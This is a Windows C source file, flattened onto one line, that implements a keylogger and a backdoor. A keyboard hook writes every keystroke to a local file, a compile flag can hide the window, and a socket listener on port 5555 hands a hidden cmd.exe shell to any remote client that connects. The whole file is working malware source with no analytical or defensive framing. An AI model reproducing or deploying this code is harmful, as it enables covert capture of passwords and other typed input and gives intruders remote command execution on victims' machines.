#define WIN32_LEAN_AND_MEAN #include #include #include "keyhook.h" #pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "HookDll.lib") LPCTSTR szWindowClass = TEXT(CLASS_NAME); LPCTSTR szTitle = TEXT(TITLE_NAME); //#define HIDE #define FILE_NAME "test.txt" #define START_STRING "connection ok!\r\n" #define SHELL_NAME "cmd.exe" #define START_DIR "c:\\" #define SERVICE_PORT (5555) #define WM_ASYNC_SELECT (WM_USER + 1) HINSTANCE hInst; ATOM MyRegisterClass(HINSTANCE hInstance); BOOL InitInstance(HINSTANCE, int); LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM); typedef struct{ SOCKET sock; BOOL acceptFlag; PROCESS_INFORMATION PI; HANDLE hThread; BOOL ThreadFlag; HANDLE fd_read; HANDLE fd_write; } DATA; SOCKET WaitConnect(HWND hWnd); BOOL AcceptConnect(SOCKET sListen, DATA *Data); void ReadConnect(DATA *Data, HWND hWnd); DWORD WINAPI OutputToSocket(LPVOID lpvoid); void CloseConnect(DATA *Data); int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) { MSG msg; MyRegisterClass(hInstance); if (!InitInstance (hInstance, nCmdShow)) { return FALSE; } BOOL bRet; while ((bRet = GetMessage(&msg, NULL, 0, 0)) != 0) { if(bRet == -1) { break; } if (!TranslateAccelerator(msg.hwnd, NULL, &msg)) { TranslateMessage(&msg); DispatchMessage(&msg); } } return (int) msg.wParam; } ATOM MyRegisterClass(HINSTANCE hInstance) { WNDCLASSEX wcex; wcex.cbSize = sizeof(WNDCLASSEX); wcex.style = CS_HREDRAW | CS_VREDRAW; wcex.lpfnWndProc = (WNDPROC)WndProc; wcex.cbClsExtra = 0; wcex.cbWndExtra = 0; wcex.hInstance = hInstance; wcex.hIcon = LoadIcon(hInstance, NULL); wcex.hCursor = LoadCursor(NULL, IDC_ARROW); wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW+1); wcex.lpszMenuName = (LPCTSTR)NULL; wcex.lpszClassName = szWindowClass; wcex.hIconSm = LoadIcon(wcex.hInstance, NULL); return RegisterClassEx(&wcex); } BOOL InitInstance(HINSTANCE hInstance, int nCmdShow) { HWND hWnd; hInst = hInstance; hWnd = CreateWindow(szWindowClass, szTitle, WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, NULL, NULL, hInstance, NULL); if (!hWnd) { return FALSE; } #ifndef HIDE ShowWindow(hWnd, nCmdShow); UpdateWindow(hWnd); #endif return TRUE; } LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) { static SOCKET sListen; static DATA Data; static HANDLE wFile; switch (message) { case WM_CREATE: if((sListen = WaitConnect(hWnd)) == -1){ DestroyWindow(hWnd); } Data.acceptFlag = TRUE; if(MySetHook()){ DestroyWindow(hWnd); } if((wFile = CreateFile(FILE_NAME, GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)) == INVALID_HANDLE_VALUE){ DestroyWindow(hWnd); } SetFilePointer(wFile, 0, NULL, FILE_END); break; case WM_ASYNC_SELECT: switch(WSAGETSELECTEVENT(lParam)) { case FD_ACCEPT: AcceptConnect(sListen, &Data); break; case FD_READ: ReadConnect(&Data, hWnd); break; case FD_CLOSE: CloseConnect(&Data); Data.acceptFlag = TRUE; break; } break; case WM_KEYHOOK: DWORD len; WriteFile(wFile, (char *)&wParam, 1, &len, NULL); FlushFileBuffers(wFile); break; case WM_DESTROY: shutdown(sListen, SD_BOTH); closesocket(sListen); WSACleanup(); MyEndHook(); CloseHandle(wFile); PostQuitMessage(0); break; default: return DefWindowProc(hWnd, message, wParam, lParam); } return 0; } SOCKET WaitConnect(HWND hWnd) { WSADATA wsaData; if(WSAStartup(MAKEWORD(2, 0), &wsaData) != 0){ return -1; } SOCKET sock; if((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET){ return -1; } SOCKADDR_IN Serv; memset(&Serv, 0, sizeof(Serv)); Serv.sin_family = AF_INET; Serv.sin_port = htons((unsigned short)(SERVICE_PORT)); Serv.sin_addr.s_addr = htonl(INADDR_ANY); if(bind(sock, (SOCKADDR *)&Serv, sizeof(Serv)) == SOCKET_ERROR){ return -1; } if(listen(sock, 0) == SOCKET_ERROR){ return -1; } if(WSAAsyncSelect(sock, hWnd, WM_ASYNC_SELECT, FD_ACCEPT|FD_CLOSE|FD_READ|FD_WRITE) == SOCKET_ERROR){ return -1; } return sock; } BOOL AcceptConnect(SOCKET sListen, DATA *Data) { SOCKET sock_tmp; SOCKADDR_IN Client; int ClientLen = sizeof(Client); if((sock_tmp = accept(sListen, (LPSOCKADDR)&Client, &ClientLen)) == INVALID_SOCKET){ return TRUE; } if(Data->acceptFlag){ Data->acceptFlag = FALSE; Data->sock = sock_tmp; }else{ closesocket(sock_tmp); return TRUE; } send(Data->sock, START_STRING, (int)strlen(START_STRING), 0); HANDLE pfd_in[2], pfd_out[2]; short int R = 0, W = 1; SECURITY_ATTRIBUTES SA; SA.lpSecurityDescriptor = NULL; SA.bInheritHandle = TRUE; SA.nLength = sizeof(SA); HANDLE hParent = GetCurrentProcess(); CreatePipe(&pfd_out[R], &pfd_out[W], &SA, 0); DuplicateHandle(hParent, pfd_out[R], hParent, &Data->fd_write, 0, FALSE, DUPLICATE_SAME_ACCESS); CloseHandle(pfd_out[R]); CreatePipe(&pfd_in[R], &pfd_in[W], &SA, 0); DuplicateHandle(hParent, pfd_in[W], hParent, &Data->fd_read, 0, FALSE, DUPLICATE_SAME_ACCESS); CloseHandle(pfd_in[W]); STARTUPINFO SI; ZeroMemory(&SI, sizeof(SI)); SI.cb = sizeof(SI); SI.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; SI.wShowWindow = SW_HIDE; SI.hStdInput = pfd_in[R]; SI.hStdOutput = pfd_out[W]; SI.hStdError = pfd_out[W]; if(CreateProcess(NULL, SHELL_NAME, NULL, NULL, TRUE, 0, NULL, START_DIR, &SI, &Data->PI) == 0){ CloseHandle(Data->fd_read); CloseHandle(Data->fd_write); CloseHandle(pfd_in[R]); CloseHandle(pfd_out[W]); return TRUE; } CloseHandle(pfd_in[R]); CloseHandle(pfd_out[W]); DWORD len; char buf[256]; ReadFile(Data->fd_write, buf, sizeof(buf), &len, NULL); char *p; if((p = strchr(buf, '>')) != NULL){ *(p + 1) = '\0'; send(Data->sock, buf, (int)strlen(buf), 0); } Data->ThreadFlag = TRUE; DWORD ThreID; if((Data->hThread = CreateThread(NULL, 0, OutputToSocket, (LPVOID)Data, 0, &ThreID)) == NULL){ DWORD len; WriteFile(Data->fd_read, "exit\r\n", 6, &len, NULL); FlushFileBuffers(Data->fd_read); WaitForSingleObject(Data->PI.hProcess, 3000); CloseHandle(Data->PI.hProcess); CloseHandle(Data->fd_read); CloseHandle(Data->fd_write); return TRUE; } return FALSE; } void ReadConnect(DATA *Data, HWND hWnd) { char c; DWORD len; recv(Data->sock, &c, 1, 0); WriteFile(Data->fd_read, &c, 1, &len, NULL); FlushFileBuffers(Data->fd_read); return; } DWORD WINAPI OutputToSocket(LPVOID lpvoid) { DATA *Data = (DATA *)lpvoid; DWORD len; char buf[1024]; while(Data->ThreadFlag){ if(ReadFile(Data->fd_write, &buf, sizeof(buf), &len, NULL) != FALSE){ if(len > 0){ send(Data->sock, buf, len, 0); } } } return 0; } void CloseConnect(DATA *Data) { Data->hThread = FALSE; WaitForSingleObject(Data->hThread, 3000); shutdown(Data->sock, SD_BOTH); closesocket(Data->sock); DWORD len; WriteFile(Data->fd_read, "exit\r\n", 6, &len, NULL); FlushFileBuffers(Data->fd_read); WaitForSingleObject(Data->PI.hProcess, 3000); CloseHandle(Data->PI.hProcess); CloseHandle(Data->hThread); CloseHandle(Data->fd_write); CloseHandle(Data->fd_read); return; }